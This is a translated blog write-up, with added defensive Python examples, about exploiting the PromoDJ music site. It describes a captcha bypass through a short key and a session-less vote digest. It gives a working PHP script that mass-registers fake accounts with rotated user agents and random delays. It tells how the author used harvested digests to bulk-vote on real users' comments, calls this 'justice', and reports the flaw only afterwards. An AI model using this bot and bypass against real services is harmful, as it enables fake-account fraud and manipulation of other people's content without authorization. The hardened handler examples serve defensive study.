
Using PromoDJ for Justice

Good day. I want to share a story that happened to me just yesterday, but let me tell it in order.



Content


  1. Introduction
  2. Possible activities
     2.1. Boosting the promo rating
     2.2. Spam
     2.3. Voting for comments
  3. Methods of implementation
  4. Preparing to register accounts
     4.1. Basic information
     4.2. Captcha
     4.3. E-mail addresses
     4.4. Constants
  5. Scripts and how they work
     5.1. Account registrar
     5.2. Authorizer
     5.3. Getting user signatures
     5.4. Shell for working with user signatures
  6. Conclusion
     6.1. Results
     6.2. Reaction of the PromoDJ administration
     6.3. Last word
  7. Toolkit

Introduction


I think many of you know about the PromoDJ portal (PDJ for short); if you don't, that's fine, I will explain. The site is a social network for musicians and DJs, photographers and singers, and many others, where each of them can post their material for evaluation, and registered users can rate and discuss it. PDJ is a great platform for a beginner music project, which is why we are registered there.

By nature I am a very curious person. I have always wanted to know what works and how, where the security holes are and how they can be used. I had some free time, so PDJ was chosen as the object of study. But before starting the research I sat down and asked myself: what benefit can be obtained from this?

For myself I identified several directions:
  1. Boosting the promo rating;
  2. Spam;
  3. Voting for comments.
I must say that I settled on the last one, but I will describe all three.

Possible activities


Boosting the promo rating

Promo is a personal rating; it is used to form the overall top of artists and the tops by style and activity. Boosting this value would give us nothing: the quality of the music stays the same, the ideology does not add to it, nor do visitor and listen counts, and after recent changes on PDJ boosting the rating became essentially impossible. The point is that, in order to vote for an artist and thereby raise his promo, you now have to verify your account by giving a mobile phone number to which a confirmation code is sent.


Spam
I added this activity only to have more items on the list. I do not like spam, and I think you don't either, so I did not consider spamming; in general I consider it the dirtiest and lowest business.


Voting for comments

PromoDJ is first of all a social network: people here are free to express their opinions and attitudes through comments, blog posts and the rating of comments.

Once I started thinking about comment ratings, I seemed to see everything from a different angle. Lately I had been coming across discussions on the PDJ forums where a particular user was unfairly given minuses for his comments, not one or two but twenty, after which inadequate users, without reading the discussion at all, picked up the baton and kept putting minuses, and a harmless comment went to -100. After these thoughts I decided to become Superman, Batman and Robin in one person, James Bond with a licence to change comment ratings, a fighter for justice, the terror flying on the wings of the night, bringing retribution in the name of the Moon.

A vivid example of an adequate and perfectly true (given the discussion) comment:

A little later, the same comment:

Methods of implementation


Before running around the city in swimming trunks, a mask and a black cape, I decided to study how the plan could be carried out and from which side to approach it. At that point I knew for sure that the request to raise or lower a comment's rating is sent without reloading the page, which means some JavaScript library forms and sends a POST, or perhaps GET, request to the PDJ server.

Let's look a little closer. The following parameters are passed in the POST request:

  digest: a parameter unique to each registered user (in places I will call it a signature), consisting of the user id and a thirty-two-character hash;
  commentID: the number of the comment;
  vote: the rating mode, "1" to plus the comment, "-1" to minus it.

Next I ended my session on the site and tried to vote for a comment, and it worked. That meant a lot to me: I now knew I would not have to log in to the site to cast a vote for a comment; everything is done in one request with three parameters. In other words, the digest alone served as a bearer credential for voting, with no binding to a session.

All the necessary knowledge was obtained, but the question of the digest remained: votes with invalid signatures were not counted, and with one signature you can vote for a given comment only once. The only way out I found was to register a number of dummy accounts and use their signatures for voting.
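To make the weakness concrete, here is an added example in Python that is not PromoDJ's code and not part of the original article. It models the vote endpoint in two forms: a weak handler that, as observed above, accepts a vote on the strength of a known digest alone and so is open to anyone holding harvested signatures, and a hardened handler in which the voting identity comes from an authenticated session plus a CSRF token, so a digest is never sent or trusted. The digest layout "userID:hash", the registry of known digests, the sessions and the votes are all constructed assumptions.

```python
"""Added example, not PromoDJ's code: the comment-vote endpoint modelled two
ways. weak_vote() behaves as observed in the article: a known digest alone
authorises the vote, no session needed. hardened_vote() derives the voter
from an authenticated session and checks a CSRF token, so a harvested
digest is useless. Digest layout 'userID:hash', the registry and all sample
data are constructed assumptions."""
import hmac
import re
import secrets

# Assumed layout: decimal user id, a separator, 32 hex characters.
DIGEST_RE = re.compile(r"^(\d+):([0-9a-f]{32})$")

# Constructed registry of valid signatures -> user id.
KNOWN_DIGESTS = {
    "101:" + "a" * 32: 101,
    "102:" + "b" * 32: 102,
}


class VoteStore:
    """One vote per (comment, user); this is the dedup the article ran into."""

    def __init__(self):
        self.votes = {}

    def cast(self, comment_id, user_id, vote):
        if vote not in (1, -1):
            return "bad vote"
        if (comment_id, user_id) in self.votes:
            return "already voted"
        self.votes[(comment_id, user_id)] = vote
        return "ok"

    def rating(self, comment_id):
        return sum(v for (c, _), v in self.votes.items() if c == comment_id)


def _parse(form):
    try:
        return int(form.get("commentID", "")), int(form.get("vote", ""))
    except ValueError:
        return None


def weak_vote(store, form):
    """Weak handler: the client-supplied digest is the only credential."""
    digest = form.get("digest", "")
    if not DIGEST_RE.match(digest) or digest not in KNOWN_DIGESTS:
        return "invalid signature"
    parsed = _parse(form)
    if parsed is None:
        return "bad request"
    return store.cast(parsed[0], KNOWN_DIGESTS[digest], parsed[1])


# Hardened handler: identity from the session, plus a per-session CSRF token.
SESSIONS = {}  # session id -> {"user_id": int, "csrf": str}


def login(user_id):
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user_id": user_id, "csrf": secrets.token_hex(16)}
    return sid


def hardened_vote(store, session_id, form):
    sess = SESSIONS.get(session_id)
    if sess is None:
        return "not logged in"
    # Constant-time compare; the token must belong to this session.
    if not hmac.compare_digest(form.get("csrf", ""), sess["csrf"]):
        return "bad csrf token"
    parsed = _parse(form)
    if parsed is None:
        return "bad request"
    return store.cast(parsed[0], sess["user_id"], parsed[1])
```

With the weak handler, the per-comment dedup still holds (one digest, one vote), which is exactly why the article needed many dummy accounts; with the hardened one, collecting signatures buys nothing, because the server never reads a voter identity from the request body.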

Preparing to register accounts


Basic information

The registration page on PromoDJ looks very bulky: all sorts of items, inputs, select boxes and checkboxes. Empirically I quickly determined which parameters have to be passed for a successful registration; they turned out to be:

$postfields = array(
    "row[login]"         => "",      // login
    "row[password1]"     => "",      // password
    "row[password2]"     => "",      // password, again
    "row[email]"         => "",      // e-mail
    "row[i]"             => "",      // first name
    "row[f]"             => "",      // last name
    "row[sex]"           => "",      // gender: man or woman
    "row[iam_clubber]"   => "1",     // status: clubber
    "row[iam_listener]"  => "1",     // status: listener
    "crow[company_kind]" => "none",  // no, I do not represent a company

    "crow[title]"        => "",      // organization name
    "crow[countryID]"    => "3159",  // country code
    "crow[regionID]"     => "0",     // region code (not specified)
    "crow[cityID]"       => "0",     // city code (not specified)
    "crow[metroID]"      => "0",     // metro station code (not specified)
    "crow[street]"       => "",      // street, house
    "crow[tel]"          => "",      // contact phone
    "crow[fax]"          => "",      // fax
    "crow[www]"          => "",      // website

    "row[styleID]"       => "",      // favourite style (code from the list)
    "row[nick]"          => "",      // nickname
    "row[title]"         => "",      // address of the page on promodj.ru
    "row[about]"         => "",      // about yourself
    "row[icq]"           => "",      // icq
    "row[skype]"         => "",      // skype
    "row[countryID]"     => "3159",  // country code
    "row[regionID]"      => "0",     // region code (not specified)
    "row[cityID]"        => "0",     // city code (not specified)
    "row[metroID]"       => "0",     // metro station code (not specified)
    "row[invite]"        => "",      // invite ("magic") code
    "row[agreed]"        => "1",     // yes, I agree to the site rules
    "respond"            => "",      // captcha response
    "key"                => ""       // captcha hash (key)
);

The choice of the "clubber" and "listener" statuses is not accidental: these statuses do not require confirmation from the administration and therefore attract no attention. For example, to pass confirmation of the "musician" status you have to describe your activity in detail, and it would look strange to the administration if requests with identical descriptions arrived one after another.

Captcha

Going to the end of the questionnaire, in the last item we find the captcha, which nastily bends the text, making static recognition difficult:

As I wrote above, the registration request carries not only the response to the captcha but also the hash itself. The same hash is used to generate the image:
pdj.ru/captcha_big.gif?key=0ad241a541a4f2e8a7457138b6c2299e

The hash is unique and can be used for registration only once; changing the hash changes the text in the picture. Visually I could not work out an algorithm for deriving the answer from the hash, so I saw three possible ways forward:
  1. Build a table of valid pairs (hash + answer);
  2. Try to determine the algorithm that derives the answer from the hash;
  3. Find an existing implementation that recognizes this type of captcha.
Building a table of valid pairs (hash + answer): very long and tedious, plus an extra script would have to be written; this option is worth considering only if there are volunteers for the work.

Trying to determine the algorithm that derives the answer from the hash: quite hard to do, or even impossible, since some hashing algorithm may be used, possibly with a salt. Not an option.

Finding a recognizer for this type of captcha: I had never worked with or used such libraries, but this option could be used.

While I was weighing these options, I accidentally discovered that if the key is shorter than 32 characters, the picture shows four zeros. Having found that, I only needed to check whether PDJ had a guard against this case. I changed the necessary parameters in the page code and successfully registered a new account. In other words, with a short key the captcha answer became predictable, and the server did not reject such keys.
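The following Python block is an added example, not PDJ's code, reconstructing one plausible way such a defect arises: the challenge text is derived from the key, anything that is not a 32-character key falls back to a fixed "0000", and verification recomputes the text from whatever key the client supplies. Beside it is a strict version that accepts only server-issued, well-formed, single-use keys. The secret, the text derivation and the sample keys are assumptions; how PDJ actually derived the text is not known from the article.

```python
"""Added example (not the PromoDJ code): a model of the captcha-key defect the
article describes, beside a strict version. The weak path derives the
challenge text from the key and falls back to a fixed '0000' for anything
that is not a 32-character key; because verification reuses the same
function, a short client-chosen key (1, 2, 3, ...) is a predictable,
reusable captcha. The strict path honours only server-issued keys,
validates their format and burns each key on first use. The secret and the
derivation are assumptions."""
import hashlib
import hmac
import re
import secrets

KEY_RE = re.compile(r"^[0-9a-f]{32}$")
SERVER_SECRET = b"constructed-demo-secret"  # assumption: server-side salt


def challenge_text(key: str) -> str:
    """Text drawn on the image for a given key (assumed derivation)."""
    if not KEY_RE.match(key):
        return "0000"  # the fallback the article observed for short keys
    h = hmac.new(SERVER_SECRET, key.encode(), hashlib.sha256).hexdigest()
    return str(int(h[:8], 16) % 10000).zfill(4)


def weak_verify(key: str, respond: str) -> bool:
    """Weak check: recompute from whatever key the client sent.
    Any short key validates with '0000', and any well-formed key validates
    without ever having been issued by the server."""
    return respond == challenge_text(key)


class StrictCaptcha:
    def __init__(self):
        self.pending = {}  # key -> expected answer, server-issued only

    def issue(self) -> str:
        key = secrets.token_hex(16)  # 32 hex characters
        self.pending[key] = challenge_text(key)
        return key

    def verify(self, key: str, respond: str) -> bool:
        if not KEY_RE.match(key):
            return False  # malformed key: reject, no fallback image
        expected = self.pending.pop(key, None)  # single use, even on failure
        if expected is None:
            return False  # never issued, or already consumed
        return hmac.compare_digest(respond, expected)
```

The two defensive properties that matter are separate: the format check removes the predictable fallback, and the server-side store of issued keys removes the ability to mint your own challenge (the article's registrar simply counted upward from 1).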

E-mail addresses

I decided not to hunt for mailboxes, not to create them by hand, not to look for people selling databases, and not to send Trojans to friends and acquaintances. Why? Yandex will do everything for us.

Constants

Almost everything is ready for registering accounts; it remains to collect the missing data, namely:
  1. A list of names to register;
  2. Music style codes;
  3. A small list of user agents.
As the list of names I used a large database of nicks found on the Internet. The other data:

$uagents = array(
    "Opera/9.20 (Windows NT 6.0; U; en)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
    "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
    "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0"
);

$styles = explode(";", "88;2;4;7;6;14;31;15;18;23;25;27;28;8;24;29;30;44;46;47;49;37;1;80;16");


Scripts and how they work


Account registrar

set_time_limit(0);
$magic = 0;
$i = 1;

$fp = fopen('names.txt', 'rb');
while (($line = fgets($fp)) !== false) {
    // login, both passwords, nick and page address are all the same word
    $name = trim($line);
    $postfields["row[login]"] = $postfields["row[password1]"] = $postfields["row[password2]"]
        = $postfields["row[nick]"] = $postfields["row[title]"] = $name;
    $postfields["row[email]"]   = $name . "@asdfghhgj.ru";
    $postfields["row[sex]"]     = (rand(0, 1) ? "man" : "woman");
    $postfields["row[styleID]"] = $styles[rand(0, sizeof($styles) - 1)];
    $postfields["key"]          = $magic + $i;   // a key shorter than 32 characters: the captcha shows four zeros

    $ci = curl_init();
    curl_setopt($ci, CURLOPT_USERAGENT, $uagents[rand(0, sizeof($uagents) - 1)]);
    curl_setopt($ci, CURLOPT_CONNECTTIMEOUT, 30);
    curl_setopt($ci, CURLOPT_TIMEOUT, 30);
    curl_setopt($ci, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ci, CURLOPT_POST, TRUE);
    curl_setopt($ci, CURLOPT_POSTFIELDS, $postfields);
    curl_setopt($ci, CURLOPT_URL, "pdj.ru/register/");
    curl_exec($ci);
    curl_close($ci);

    $i++;
    sleep(rand(5, 25));   // random pause between registrations
}
fclose($fp);

While the script runs, notifications of successful registration arrive:



Authorizer

So as not to arouse any suspicion and not to say goodbye to all the accounts in a moment, I decided to activate (authorize) every one of them. To do this I exported all the letters from the e-mail client, pulled the confirmation links out of them and got a list with a huge number of entries.

Getting user signatures

Obtaining a signature consisted of several steps:
  1. Log the user in through the form on the login page;
  2. Go to the PromoDJ home page;
  3. Extract the digest parameter from the page source.
This took about two and a half to three hours, but there was a plus: I was never banned, received no notices from the administration about any violations, and none of the accounts was deleted during the whole time.

Shell for working with user signatures

To vote on comments I made a convenient shell where I could specify the address of a comment and what to do with it: put a plus or a minus.


On the settings page you can choose the operating mode:

In automatic mode, after clicking the "Run" button, every available hash votes for the specified comment. In manual mode you can pick any hash from the list and vote with it:


Conclusion


Results


Randomized goodness and love were sown throughout PromoDJ.

Reaction of the PromoDJ administration

After I sent a letter to the portal's technical support, I could not have imagined that it would all end with a premium account and branding as a present for my curiosity, which will come in very handy for our music project.



Last word

The vulnerability described above, which made the registration of accounts possible, was closed a few minutes after my letter.

Thank you for reading to the very end. Good luck and see you in new articles!

Toolkit


The following were used in the course of the work:

Source: https://habr.com/ru/post/129430/

